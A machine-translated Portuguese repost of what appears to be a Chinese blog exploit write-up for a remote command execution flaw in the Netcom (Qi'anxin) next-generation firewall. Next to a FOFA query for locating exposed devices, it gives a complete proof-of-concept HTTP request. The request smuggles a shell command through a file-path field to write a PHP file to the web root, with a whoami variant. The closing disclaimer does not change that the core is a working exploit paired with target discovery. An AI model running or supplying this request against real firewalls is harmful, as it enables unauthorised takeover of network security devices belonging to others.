Vulnerabilidade Recurrence-Netcom (Qi’anxin) NGFW Next Generation Firewall Execução Remota de Comando

Enterprise 2023-10-02 04:05:34 views: null

Descrição da vulnerabilidade

Netcom Next Generation Firewall (NGFW) é um firewall de camada de aplicativo de alto desempenho lançado pela Netcom Technology que pode responder de forma abrangente às ameaças de rede. Este NGFW possui uma vulnerabilidade de execução remota de comandos. Um invasor pode executar comandos do sistema construindo solicitações especiais. Com seus fortes recursos de identificação de aplicativos, os firewalls de próxima geração podem obter insights aprofundados sobre usuários, aplicativos e conteúdo no tráfego de rede.Com a ajuda de um novo mecanismo de processamento paralelo heterogêneo de caminho único de alto desempenho, os firewalls de próxima geração podem detecte e identifique usuários em cenários como saída da Internet, limites de data center e front-ends de serviços de aplicativos.Forneça proteção de segurança eficiente e integrada à camada de aplicativos para ajudar os usuários a conduzir negócios com segurança e reduzir custos de segurança.

Sintaxe FOFA:app="网康科技-下一代防火墙"

 Em 23 de junho, ainda havia mais de 600 ativos fofos.

POC


POST /directdata/direct/router HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 188
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip

{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;echo '<?php echo md5(1);unlink(__FILE__);?>' >/var/www/html/testmd5.php"]}],"type":"rpc","tid":17}

Após executar este comando, o arquivo será excluído após o valor md5 ser ecoado.

echo '<?php echo md5(1);unlink(__FILE__);?>' >/var/www/html/testmd5.php

 Você também pode verificar diretamente com whoami

whoami >/var/www/html/whoami.txt

Os artigos técnicos são apenas para referência. As informações fornecidas neste artigo são apenas para aprendizado. Não use as informações técnicas do artigo para invadir qualquer sistema de computador sem autorização. O usuário será responsável por quaisquer consequências e prejuízos diretos ou indiretos causados ​​pelo uso das informações fornecidas neste artigo. As ferramentas fornecidas neste artigo são apenas para aprendizagem e não podem ser utilizadas para outros fins! ! !

Acho que você gosta

Origin blog.csdn.net/qq_17754023/article/details/131348284
Recomendado
Clasificación
Diario
Más
2024-06-15(0)
2024-06-14(0)
2024-06-13(0)
2024-06-12(0)
2024-06-11(0)
2024-06-10(0)
2024-06-09(0)
2024-06-08(0)
2024-06-07(0)
2024-06-06(0)

Code World

© 2018 codetd.com